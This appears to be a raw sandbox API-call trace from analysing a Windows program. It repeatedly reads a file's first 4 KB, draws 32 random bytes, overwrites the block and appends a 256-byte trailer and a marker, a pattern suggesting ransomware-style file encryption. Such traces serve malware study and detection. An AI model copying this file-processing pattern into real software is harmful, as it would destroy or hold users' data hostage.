GetProcessHeap () returned 0x4f10000 [0079.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0079.879] SetFilePointerEx (in: hFile=0x840, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.879] WriteFile (in: hFile=0x840, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0079.879] WriteFile (in: hFile=0x840, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0079.879] GetProcessHeap () returned 0x4f10000 [0079.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0079.879] GetProcessHeap () returned 0x4f10000 [0079.880] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0079.880] GetProcessHeap () returned 0x4f10000 [0079.880] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0079.880] CloseHandle (hObject=0x840) returned 1 [0079.881] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 49 [0079.881] SetFilePointerEx (in: hFile=0x844, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.881] ReadFile (in: hFile=0x844, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0079.881] SetFilePointerEx (in: hFile=0x844, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.881] GetProcessHeap () returned 0x4f10000 [0079.881] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0079.881] GetProcessHeap () returned 0x4f10000 [0079.881] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0079.881] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0079.881] GetProcessHeap () returned 0x4f10000 [0079.881] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0079.881] ReadFile (in: hFile=0x844, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0079.928] SetFilePointerEx (in: hFile=0x844, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.928] WriteFile (in: hFile=0x844, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.929] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.929] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.929] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.929] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.929] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.929] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.929] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.929] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.929] GetProcessHeap () returned 0x4f10000 [0079.930] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.930] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.930] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.930] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.930] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.930] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.930] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.930] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.930] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.930] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.930] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.930] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.930] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.930] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.930] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.930] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.930] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.930] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.930] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.930] GetProcessHeap () returned 0x4f10000 [0079.931] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.931] GetProcessHeap () returned 0x4f10000 [0079.931] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0079.931] GetProcessHeap () returned 0x4f10000 [0079.931] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.931] GetProcessHeap () returned 0x4f10000 [0079.931] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0079.931] GetProcessHeap () returned 0x4f10000 [0079.931] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0079.931] GetProcessHeap () returned 0x4f10000 [0079.931] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0079.931] GetProcessHeap () returned 0x4f10000 [0079.931] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0079.931] GetProcessHeap () returned 0x4f10000 [0079.931] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0079.931] GetProcessHeap () returned 0x4f10000 [0079.931] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0079.931] GetProcessHeap () returned 0x4f10000 [0079.931] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.931] GetProcessHeap () returned 0x4f10000 [0079.931] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0079.931] GetProcessHeap () returned 0x4f10000 [0079.931] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.931] GetProcessHeap () returned 0x4f10000 [0079.931] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.931] GetProcessHeap () returned 0x4f10000 [0079.931] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.931] GetProcessHeap () returned 0x4f10000 [0079.931] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.931] GetProcessHeap () returned 0x4f10000 [0079.931] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.931] GetProcessHeap () returned 0x4f10000 [0079.931] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.932] GetProcessHeap () returned 0x4f10000 [0079.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.932] GetProcessHeap () returned 0x4f10000 [0079.932] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.932] GetProcessHeap () returned 0x4f10000 [0079.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.932] GetProcessHeap () returned 0x4f10000 [0079.932] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.932] GetProcessHeap () returned 0x4f10000 [0079.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.932] GetProcessHeap () returned 0x4f10000 [0079.932] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.932] GetProcessHeap () returned 0x4f10000 [0079.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.932] GetProcessHeap () returned 0x4f10000 [0079.932] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.932] GetProcessHeap () returned 0x4f10000 [0079.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.932] GetProcessHeap () returned 0x4f10000 [0079.932] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.932] GetProcessHeap () returned 0x4f10000 [0079.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.932] GetProcessHeap () returned 0x4f10000 [0079.932] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.932] GetProcessHeap () returned 0x4f10000 [0079.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.932] GetProcessHeap () returned 0x4f10000 [0079.932] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.933] GetProcessHeap () returned 0x4f10000 [0079.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.933] GetProcessHeap () returned 0x4f10000 [0079.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.933] GetProcessHeap () returned 0x4f10000 [0079.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.933] GetProcessHeap () returned 0x4f10000 [0079.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.933] GetProcessHeap () returned 0x4f10000 [0079.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0079.933] GetProcessHeap () returned 0x4f10000 [0079.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.933] GetProcessHeap () returned 0x4f10000 [0079.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0079.933] GetProcessHeap () returned 0x4f10000 [0079.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0079.933] GetProcessHeap () returned 0x4f10000 [0079.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0079.933] GetProcessHeap () returned 0x4f10000 [0079.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0079.933] SetFilePointerEx (in: hFile=0x844, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.933] WriteFile (in: hFile=0x844, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0079.933] WriteFile (in: hFile=0x844, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0079.933] GetProcessHeap () returned 0x4f10000 [0079.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0079.933] GetProcessHeap () returned 0x4f10000 [0079.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0079.934] GetProcessHeap () returned 0x4f10000 [0079.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0079.934] CloseHandle (hObject=0x844) returned 1 [0079.935] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 50 [0079.935] SetFilePointerEx (in: hFile=0x848, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.935] ReadFile (in: hFile=0x848, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0079.935] SetFilePointerEx (in: hFile=0x848, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.935] GetProcessHeap () returned 0x4f10000 [0079.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0079.935] GetProcessHeap () returned 0x4f10000 [0079.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0079.935] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0079.935] GetProcessHeap () returned 0x4f10000 [0079.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0079.935] ReadFile (in: hFile=0x848, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0080.124] SetFilePointerEx (in: hFile=0x848, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.125] WriteFile (in: hFile=0x848, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0080.125] GetProcessHeap () returned 0x4f10000 [0080.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0080.125] GetProcessHeap () returned 0x4f10000 [0080.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.125] GetProcessHeap () returned 0x4f10000 [0080.125] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0080.125] GetProcessHeap () returned 0x4f10000 [0080.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.125] GetProcessHeap () returned 0x4f10000 [0080.125] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0080.125] GetProcessHeap () returned 0x4f10000 [0080.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.125] GetProcessHeap () returned 0x4f10000 [0080.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.125] GetProcessHeap () returned 0x4f10000 [0080.125] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.125] GetProcessHeap () returned 0x4f10000 [0080.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.125] GetProcessHeap () returned 0x4f10000 [0080.125] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.125] GetProcessHeap () returned 0x4f10000 [0080.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.125] GetProcessHeap () returned 0x4f10000 [0080.125] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.125] GetProcessHeap () returned 0x4f10000 [0080.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.125] GetProcessHeap () returned 0x4f10000 [0080.125] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.125] GetProcessHeap () returned 0x4f10000 [0080.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.126] GetProcessHeap () returned 0x4f10000 [0080.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.126] GetProcessHeap () returned 0x4f10000 [0080.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.126] GetProcessHeap () returned 0x4f10000 [0080.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.126] GetProcessHeap () returned 0x4f10000 [0080.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.126] GetProcessHeap () returned 0x4f10000 [0080.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.126] GetProcessHeap () returned 0x4f10000 [0080.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.126] GetProcessHeap () returned 0x4f10000 [0080.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.126] GetProcessHeap () returned 0x4f10000 [0080.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.126] GetProcessHeap () returned 0x4f10000 [0080.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.126] GetProcessHeap () returned 0x4f10000 [0080.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.126] GetProcessHeap () returned 0x4f10000 [0080.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.126] GetProcessHeap () returned 0x4f10000 [0080.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.126] GetProcessHeap () returned 0x4f10000 [0080.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.126] GetProcessHeap () returned 0x4f10000 [0080.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.126] GetProcessHeap () returned 0x4f10000 [0080.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.127] GetProcessHeap () returned 0x4f10000 [0080.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.127] GetProcessHeap () returned 0x4f10000 [0080.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.127] GetProcessHeap () returned 0x4f10000 [0080.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.127] GetProcessHeap () returned 0x4f10000 [0080.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.127] GetProcessHeap () returned 0x4f10000 [0080.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.127] GetProcessHeap () returned 0x4f10000 [0080.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.127] GetProcessHeap () returned 0x4f10000 [0080.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.127] GetProcessHeap () returned 0x4f10000 [0080.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.127] GetProcessHeap () returned 0x4f10000 [0080.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0080.127] GetProcessHeap () returned 0x4f10000 [0080.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.127] GetProcessHeap () returned 0x4f10000 [0080.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0080.127] GetProcessHeap () returned 0x4f10000 [0080.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0080.127] GetProcessHeap () returned 0x4f10000 [0080.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0080.127] GetProcessHeap () returned 0x4f10000 [0080.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0080.127] GetProcessHeap () returned 0x4f10000 [0080.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0080.127] GetProcessHeap () returned 0x4f10000 [0080.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0080.127] GetProcessHeap () returned 0x4f10000 [0080.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.127] GetProcessHeap () returned 0x4f10000 [0080.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0080.128] GetProcessHeap () returned 0x4f10000 [0080.128] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.128] GetProcessHeap () returned 0x4f10000 [0080.128] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.128] GetProcessHeap () returned 0x4f10000 [0080.128] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.128] GetProcessHeap () returned 0x4f10000 [0080.128] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 